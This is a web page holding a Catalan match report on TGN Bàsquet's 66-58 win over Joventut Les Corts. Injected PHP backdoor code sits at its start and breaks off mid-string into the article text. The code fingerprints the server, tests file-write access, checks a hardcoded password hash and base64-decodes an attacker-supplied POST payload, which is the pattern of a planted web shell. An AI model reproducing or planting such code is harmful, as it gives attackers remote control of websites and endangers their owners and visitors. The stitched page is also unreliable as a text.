function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Debut al Sagrat Cor amb victòria! (66-58) -

Debut al Sagrat Cor amb victòria! (66-58)

Updated: octubre 1, 2022

Primer partit de la temporada del Sènior A de Copa Catalunya al Sagrat Cor que ha finalitzat amb victòria (66-58) contra el Joventut Les Corts. El duel s’ha decidit en el segon període amb un contundent parcial de 25-7 a favor del conjunt tarragoní.

En el primer temps a l’equip Lila li ha costat entrar en joc a causa dels nervis del debut a casa, fallant cistelles senzilles i defensant amb poca intensitat. A l’inici del segon quart, l’equip tarragoní ha estat més sòlid en defensa i en atac ha generat moltes superioritats, fent transicions ràpides que han permès al TGN Bàsquet posar-se per davant a l’electrònic, arribant al descans 14 punts per sobre (42-28).

A la represa, les Liles han seguit molt intenses defensivament i això ha provocat que el conjunt visitant no pogués escurçar diferències. Així doncs, primera victòria del curs 22/23 del TGN Bàsquet contra un clàssic de la categoria.

L’entrenador Lila –Marc Rovirosa– ha fet una valoració després del matx: ”Les sensacions són bones, l’equip ha treballat molt bé, guanyar és important i a més en un nou projecte com aquest. Sense cap mena de dubte aquest triomf ens donarà molta tranquil·litat per poder preparar el proper desplaçament contra el CB Igualada.

”Guanyar és important i a més en un projecte que és inicial”

La setmana vinent l’equip jugarà diumenge 9 contra el CB Igualada (17.30). Som-hi Liles sou 100% #ADNTGN

TGN BÀSQUET A: 66 – JOVENTUT LES CORTS 58

PARCIALS: 17-21, 25-7, 15-17, 9-13